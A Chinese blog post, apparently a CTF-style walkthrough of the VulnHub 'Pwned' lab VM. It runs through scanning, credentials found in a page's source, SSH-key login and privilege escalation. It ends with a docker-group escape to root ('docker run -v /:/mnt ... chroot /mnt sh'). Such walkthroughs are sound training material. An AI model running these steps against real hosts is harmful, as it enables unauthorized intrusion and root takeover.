vulnhub之Pwned的实践

admin 2023年4月3日00:05:02评论16 views字数 866阅读2分53秒阅读模式

今天实践的是vulnhub的Pwned镜像,

下载地址,https://download.vulnhub.com/pwned/Pwned.ova,

先是用workstation导入,点击编辑配置就直接崩溃了,

于是又用virtualbox导入,做地址扫描,

sudo netdiscover -r 192.168.0.0/24,有地址了,189就是,

vulnhub之Pwned的实践

再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.189,

vulnhub之Pwned的实践

有web服务,为了能正常用gobuster做目录扫描,需要先添加ip和域名的静态关系,

/etc/hosts

192.168.0.189       pwned

扫描,gobuster dir -u http://pwned -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt,

vulnhub之Pwned的实践

浏览器访问,http://192.168.0.189/hidden_text,

vulnhub之Pwned的实践

继续浏览器访问http://192.168.0.189/pwned.vuln,

vulnhub之Pwned的实践

查看页面源码,

vulnhub之Pwned的实践

获取到ftp的用户名密码,ftpuser/B0ss_B!TcH,

登录ftp,

vulnhub之Pwned的实践

获取到note.txt和id_rsa两个文件,

从note.txt查看到用户名ariana,

给id_rsa权限chmod 600 id_rsa,

ssh到靶机,ssh [email protected] -i id_rsa,

不是root,需要提权,

vulnhub之Pwned的实践

sudo -l查看到selena可以执行/home/messenger.sh,

查看/home/messenger.sh,

vulnhub之Pwned的实践

以selena执行/home/messenger.sh,

获取到新的shell,还不是root,需要继续提权,

账号在docker组里,查看系统里的docker镜像,

执行命令,docker run -v /:/mnt --rm -it privesc chroot /mnt sh,

这回拿到root权限了,

vulnhub之Pwned的实践


原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Pwned的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月3日00:05:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之Pwned的实践http://cn-sec.com/archives/1647111.html

发表评论

匿名网友 填写信息